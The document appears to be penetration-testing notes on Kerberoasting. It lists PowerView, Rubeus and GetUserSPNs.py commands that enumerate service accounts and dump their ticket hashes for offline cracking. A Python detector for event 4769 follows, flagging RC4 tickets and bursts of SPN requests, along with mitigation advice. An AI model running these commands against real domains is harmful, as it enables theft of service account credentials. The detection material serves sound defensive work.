Offline cracking of service account passwords. The Kerberos service ticket (TGS) has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and perform an offline password attack. Service accounts are often ignored (passwords are rarely changed) and have privileged access. Password hashes of service accounts could be used to create Silver tickets.
The attack occurs in step 4: a TGS is requested (with Rubeus or GetUserSPNs.py), and the part encrypted with the target service account's password hash is extracted from it and cracked offline. The requested TGS is never presented to the application server (no AP-REQ is sent); it is only saved and cracked offline.
Find user accounts used as Service Accounts
Get-DomainUser -SPN #PowerView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #ActiveDirectory module
Use Rubeus to list Kerberoast users and stats (ONLY FROM AD JOINED MACHINE)
.\Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /stats
Use Rubeus to request a TGS and save it to a file:
.\Rubeus.exe kerberoast /user:svctest /simple
.\Rubeus.exe kerberoast /user:svctest /outfile:svctest.txt
Kerberoast all possible accounts:
.\Rubeus.exe kerberoast /outfile:KerbUsers_hashes.txt
sudo GetUserSPNs.py <domain>/<user>:<password> -dc-ip <ip.of.domain.controller> -request -outputfile kerber.hash
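The defender-side counterpart to the steps above, as an added example that is not part of the original notes, Rubeus or impacket: a small Python detector that runs over Windows Security event 4769 ("A Kerberos service ticket was requested") records, which the domain controller logs for every TGS request described here. It flags two things: a service ticket requested with RC4-HMAC (TicketEncryptionType 0x17) for a user service account, which is what cracking tools request because RC4 is far cheaper to brute-force than AES, and one requester pulling tickets for many distinct SPNs within a short window, which is what the "Kerberoast all possible accounts" run looks like on the KDC. The sample records, the field names (which mirror the event's TargetUserName, ServiceName, TicketEncryptionType and IpAddress), the thresholds and the RC4 allowlist are constructed assumptions for the demonstration.

```python
"""Kerberoast detection over Windows Security event 4769 records.

Signals:
  1. RC4-HMAC (0x17) service tickets for user service accounts: modern domains issue
     AES (0x11/0x12) tickets, so an RC4 TGS for an SPN-bearing user is suspicious.
  2. One requester asking for tickets to many distinct services in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for rc4-hmac in event 4769

# Constructed sample records (not real telemetry). Keys mirror the 4769 fields
# TimeCreated, TargetUserName, ServiceName, TicketEncryptionType and IpAddress.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "user": "alice@CORP.LOCAL", "service": "fileserver01$", "etype": "0x12", "ip": "10.0.0.5"},
    {"time": "2024-05-01T09:00:03", "user": "alice@CORP.LOCAL", "service": "krbtgt", "etype": "0x12", "ip": "10.0.0.5"},
    {"time": "2024-05-01T09:05:00", "user": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:05:01", "user": "bob@CORP.LOCAL", "service": "svc_web", "etype": "0x17", "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:05:01", "user": "bob@CORP.LOCAL", "service": "svc_backup", "etype": "0x17", "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:05:02", "user": "bob@CORP.LOCAL", "service": "svc_report", "etype": "0x17", "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:05:02", "user": "bob@CORP.LOCAL", "service": "svc_sharepoint", "etype": "0x17", "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:30:00", "user": "legacyapp@CORP.LOCAL", "service": "svc_legacy", "etype": "0x17", "ip": "10.0.0.9"},
]


def is_computer_account(service: str) -> bool:
    """Machine accounts (name ends in '$') rotate their password automatically,
    so their tickets are not a useful cracking target; tools skip them by default."""
    return service.endswith("$")


def rc4_service_ticket_alerts(events, allowlist=frozenset()):
    """Return the events that requested an RC4-encrypted ticket for a user service
    account. `allowlist` holds service names known to still require RC4 (assumed)."""
    return [
        e for e in events
        if e["etype"] == RC4_HMAC
        and e["service"] != "krbtgt"            # TGT itself, not a service ticket target
        and not is_computer_account(e["service"])
        and e["service"] not in allowlist
    ]


def spn_burst_alerts(events, threshold=5, window=timedelta(minutes=2)):
    """Return {requester: peak distinct services within `window`} for every requester
    whose peak reaches `threshold`. A sliding window over each user's sorted requests."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        peak = 0
        for i, (t_end, _) in enumerate(reqs):
            # distinct services requested in the window ending at this event
            distinct = {svc for t, svc in reqs[: i + 1] if t >= t_end - window}
            peak = max(peak, len(distinct))
        if peak >= threshold:
            alerts[user] = peak
    return alerts


if __name__ == "__main__":
    for e in rc4_service_ticket_alerts(SAMPLE_EVENTS):
        print(f"RC4 service ticket: {e['user']} -> {e['service']} from {e['ip']} at {e['time']}")
    for user, n in spn_burst_alerts(SAMPLE_EVENTS).items():
        print(f"Burst: {user} requested tickets for {n} distinct services within 2 minutes")
```

On the constructed input the RC4 rule fires for every one of bob's requests and for the legacy application (unless `svc_legacy` is allowlisted), and the burst rule fires only for bob, who hit five distinct SPNs in two seconds. The RC4 rule is the more durable of the two: tuning a burst threshold is environment-specific, whereas an RC4 ticket for an SPN-bearing user account in a domain that has AES keys provisioned is rarely legitimate, and removing RC4 support from those accounts (and using long, rotated passwords or group managed service accounts) removes the cheap cracking path the notes above rely on.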